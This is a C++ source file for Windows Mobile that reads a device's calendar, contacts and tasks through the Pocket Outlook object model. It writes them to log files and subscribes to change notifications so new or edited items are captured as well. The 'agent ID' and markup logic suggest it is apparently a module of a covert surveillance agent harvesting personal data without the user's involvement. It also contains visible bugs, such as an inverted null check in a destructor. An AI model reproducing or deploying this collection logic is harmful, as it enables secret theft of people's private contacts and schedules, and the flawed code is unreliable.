#define INITGUID

#include <windows.h>
#include <winbase.h>
#include <pimstore.h>

#include "PoomMan.h"
#include "PoomSerializer.h"
#include "Log.h"

#include "PoomContact.h"
#include "PoomCalendar.h"
#include "PoomCalendarReader.h"
#include "PoomTask.h"

// XXX Occhio che le funzioni OLE NON SONO thread safe, quindi questa classe
// non la possiamo richiamare da piu' thread contemporaneamente

CPoomMan* CPoomMan::_pInstance = NULL;
volatile LONG CPoomMan::lLock = 0;

IPoomFolderReader::IPoomFolderReader(IFolder *pIfolder)
	:	_pIFolder(pIfolder)
{
}

IPOutlookItemCollection* IPoomFolderReader::getItemCollection()
{
	HRESULT hr;
	IPOutlookItemCollection* ptr = NULL;

	if(_pIFolder){
		hr = _pIFolder->get_Items(&ptr);
		if(FAILED(hr))
			return NULL;
	}

	return ptr;
}

IPoomFolderReader::~IPoomFolderReader()
{
	if(!_pIFolder)
		_pIFolder->Release();

	_pIFolder = NULL;
}

/////////////////////////////////////////////////////////////////////////////////////////////////////////////
////////////////////////////	PoomMan					/////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////////////////////////////////////
CPoomMan* CPoomMan::self()
{
	while (InterlockedExchange((LPLONG)&lLock, 1) != 0)
		Sleep(1);

	if(_pInstance == NULL)
		_pInstance = new(std::nothrow) CPoomMan();

	InterlockedExchange((LPLONG)&lLock, 0);

	return _pInstance;
}

CPoomMan::CPoomMan()
:	_pIPoomApp(NULL), _bIsValid(false)
{	
	HRESULT hr;

	hr = CoInitializeEx( NULL, 0);

	hr = CoCreateInstance( CLSID_Application,
		NULL,
		CLSCTX_INPROC_SERVER,
		IID_IPOutlookApp,
		(LPVOID*) &_pIPoomApp );

	if(FAILED(hr))
		return;

	HWND win = CreateWindow(L"STATIC", L"Window", 0, 0, 0, 0, 0, NULL, NULL, GetModuleHandle(NULL), NULL);

	hr = _pIPoomApp->Logon((long) win);

	if(FAILED(hr))
		return;

	_bIsValid = true;
}

CPoomMan::~CPoomMan()
{
	if (_pIPoomApp)
		_pIPoomApp->Release();

	CPoomMan::_pInstance = NULL;
}

BOOL CPoomMan::Initialize()
{
	if (FAILED(CoInitializeEx(NULL, 0)))
		return FALSE;

	return TRUE;
}

void CPoomMan::_Export()
{
	CPoomFolderFactor *factor = new CPoomFolderFactor();
	IFolder *pIFolder;

#define EXPORT_FOLDER(x)	if (SUCCEEDED( _pIPoomApp->GetDefaultFolder(x, &pIFolder))){		\
								IPoomFolderReader *reader = _Export(factor->get(x, pIFolder));	\
								if (reader) delete reader;										\
								pIFolder->Release();											\
							}

	EXPORT_FOLDER(olFolderCalendar);	
	EXPORT_FOLDER(olFolderContacts);
	EXPORT_FOLDER(olFolderTasks);

	delete factor;
}

IPoomFolderReader* CPoomMan::_Export(IPoomFolderReader *reader)
{
	UINT uBufLen = 0;
	LPBYTE pBuffer = NULL;

	if(reader){
		
		int nCount = reader->Count();
		
		if(nCount > 0){
			CPoomSerializer pPoomSerializer;

			Log *poomLog = new Log();
			poomLog->CreateLog(reader->GetType(), NULL, 0);
			
			for(int i = 1; i <= nCount; i++){
				
				if(SUCCEEDED(reader->Get(i, &pPoomSerializer, &pBuffer, &uBufLen))){
					
					poomLog->WriteLog(pBuffer, uBufLen);
					

					if(pBuffer)	delete pBuffer;
					pBuffer = NULL;
				}
			}
			poomLog->CloseLog();
			delete poomLog;
		}
	}

	return reader;
}

void CPoomMan::_ExportOnce(DWORD dwType, LONG lOid)
{	
	CPoomFolderFactor *factor = new CPoomFolderFactor();
	IFolder *pIFolder;

	if (SUCCEEDED(_pIPoomApp->GetDefaultFolder((int)dwType, &pIFolder))){
		IPoomFolderReader *reader = _ExportOnce(factor->get((OlDefaultFolders) dwType, pIFolder), lOid);
		if(reader)	delete reader;
		pIFolder->Release();
	}

	if(factor)	delete factor;
}

IPoomFolderReader* CPoomMan::_ExportOnce(IPoomFolderReader *reader, LONG lOid)
{
	UINT uBufLen = 0;
	LPBYTE pBuffer = NULL;

	if(reader){
		
		CPoomSerializer pPoomSerializer;
		
		if(SUCCEEDED(reader->GetOnce(_pIPoomApp, lOid, &pPoomSerializer, &pBuffer, &uBufLen))){

			Log *poomLog = new Log();

			poomLog->CreateLog(reader->GetType(), NULL, 0);
			poomLog->WriteLog(pBuffer, uBufLen);			

			if(pBuffer)	delete pBuffer;
		
			poomLog->CloseLog();
			delete poomLog;
		}
	}
	
	return reader;
}

void CPoomMan::Notifications()
{
	MSG msg;
	ZeroMemory(&msg, sizeof(MSG));

	if(PeekMessage(&msg, NULL, 0, 0, PM_REMOVE)){
		if( msg.message == PIM_ITEM_CREATED_REMOTE	||
			msg.message == PIM_ITEM_CHANGED_REMOTE ){

			if( msg.lParam == olFolderCalendar ||
				msg.lParam == olFolderContacts ||
				msg.lParam == olFolderTasks){
				
				_pInstance->_ExportOnce((DWORD) msg.lParam, (LONG) msg.wParam);
			}
		}
		DispatchMessage(&msg);
	}
}

HRESULT CPoomMan::_SubscribeToNotifications(IPOutlookApp *pPoom, OlDefaultFolders olFolder, UINT uiNotificationsType)
{
	HRESULT		hr          = 0;
	IFolder		*pFolder	= NULL;
	IItem		*pItem      = NULL;
	CEPROPVAL	propval     = {0};

	hr = pPoom->GetDefaultFolder(olFolder, &pFolder);
	hr = pFolder->QueryInterface(IID_IItem, (LPVOID*)&pItem);

	propval.propid      = PIMPR_FOLDERNOTIFICATIONS;
	propval.val.ulVal   = uiNotificationsType;
	hr = pItem->SetProps(0, 1, &propval);
	DWORD dwError = GetLastError();

	pItem->Release();
	pFolder->Release();

	return hr;
}

void CPoomMan::Run(UINT uAgentId)
{

	DWORD dwVersion = 1;
	BYTE *pBuf = NULL;
	UINT uSize = sizeof(DWORD);
	HRESULT hr;

	if(!IsValid()){
		_pInstance = self();
	}

	Log *pPOOMMarkup = new(std::nothrow) Log();

	if(pPOOMMarkup == NULL)
		return;

	if(!pPOOMMarkup->IsMarkup(uAgentId)){
		// Export di tutti i dati
		_pInstance->_Export();

		pPOOMMarkup->WriteMarkup(uAgentId,(BYTE *)&dwVersion, uSize);
	}

	pBuf = pPOOMMarkup->ReadMarkup(uAgentId, &uSize);
	delete pPOOMMarkup;

	hr = _pInstance->_SubscribeToNotifications(_pInstance->_pIPoomApp, olFolderContacts, PIMFOLDERNOTIFICATION_REMOTE);
	hr = _pInstance->_SubscribeToNotifications(_pInstance->_pIPoomApp, olFolderCalendar, PIMFOLDERNOTIFICATION_REMOTE);
	hr = _pInstance->_SubscribeToNotifications(_pInstance->_pIPoomApp, olFolderTasks, PIMFOLDERNOTIFICATION_REMOTE);

	if(pBuf && uSize == sizeof(DWORD)){
		CopyMemory(&dwVersion, pBuf, uSize);
		delete[] pBuf;

		if(dwVersion == 1){
			// Attesa delle notifiche di modifica o nuovo inserimento
			return;
		}
	}

	return;
}